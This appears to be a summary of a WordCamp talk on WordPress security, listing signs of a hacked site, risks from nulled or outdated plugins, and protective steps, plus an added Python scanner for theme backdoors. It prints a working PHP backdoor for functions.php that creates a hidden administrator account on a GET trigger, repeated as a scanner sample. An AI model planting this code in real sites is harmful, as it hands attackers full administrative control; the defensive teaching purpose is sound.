RFStudio's Co-Founder Max (Hassan) Raza delivered a detailed session, with demonstrations, on WordPress security and shared experiences with the WordCamp community about security and how to make WordPress more secure together.
Hacked?
Probably Yes If:
• Permalinks structure changed (Auto)
• .htaccess results in 301 Redirection to Random Sites
• Spurious Redirections from your Home Page
• Weird Content and Banner Ads on Your Site
• Google Site View Shows Irrelevant Links
• Unusual Admin Users
• Weird DB Tables
Vulnerable Third Party Components are the Primary Attack Vector.
You are easily Hack-able if:
1- You are using Nulled Themes
2- You have Vulnerable Plugins in Use
3- You have Outdated Themes/Plugins
PHP Backdoor
Inject a small piece of code into the theme's functions.php and you have full wp access!

```php
<?php
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>
```
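As an added example (not part of the talk), a small Python scanner that looks for the pattern this slide injects into functions.php: a request parameter used as a trigger, a call that creates a user, and that user being given the administrator role. The indicator names, the functions and the embedded sample file are all constructed here.

```python
import re
from pathlib import Path

# Indicators taken from the backdoor on the slide: a request parameter used as a
# trigger, a user being created, and that user promoted to administrator.
INDICATORS = {
    "request_trigger": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
    "user_creation": re.compile(r"\bwp_(create|insert)_user\s*\(", re.I),
    "admin_role": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]\s*\)", re.I),
}

def find_backdoor_indicators(php_source):
    """Return {indicator_name: [line numbers]} for each indicator that appears."""
    hits = {}
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def is_suspicious(php_source):
    """Flag only when all three indicators co-occur; any one alone is common
    in legitimate theme or plugin code and would produce noise."""
    hits = find_backdoor_indicators(php_source)
    return all(name in hits for name in INDICATORS)

def scan_theme_dir(theme_root):
    """Return every functions.php under theme_root that matches the pattern."""
    flagged = []
    for path in Path(theme_root).rglob("functions.php"):
        if is_suspicious(path.read_text(errors="replace")):
            flagged.append(str(path))
    return flagged

# Constructed sample reproducing the slide's backdoor (not a real theme file).
BACKDOORED = """<?php
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
        $user = new WP_User($user_id);
        $user->set_role('administrator');
    }
}
"""

if __name__ == "__main__":
    print("slide backdoor flagged:", is_suspicious(BACKDOORED))  # True
```

Run `scan_theme_dir("wp-content/themes")` from the WordPress root to check every installed theme; a match is a reason to diff the file against a clean copy of the theme, not proof by itself.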
Hackers Guide
Keep WordPress Updated
Use Strong Passwords & Permissions
Install Backup Solution
Try Hacking your Own Site!
Top Plugins to Make Security Easy
1- WordFence
2- Sucuri Security
3- iThemes Security
WordPress Security Experts
Bug Bounty Program Since 2016
https://hackerone.com/wordpress
Follow Best Practices Listed by Experts here
https://wordpress.org/about/security/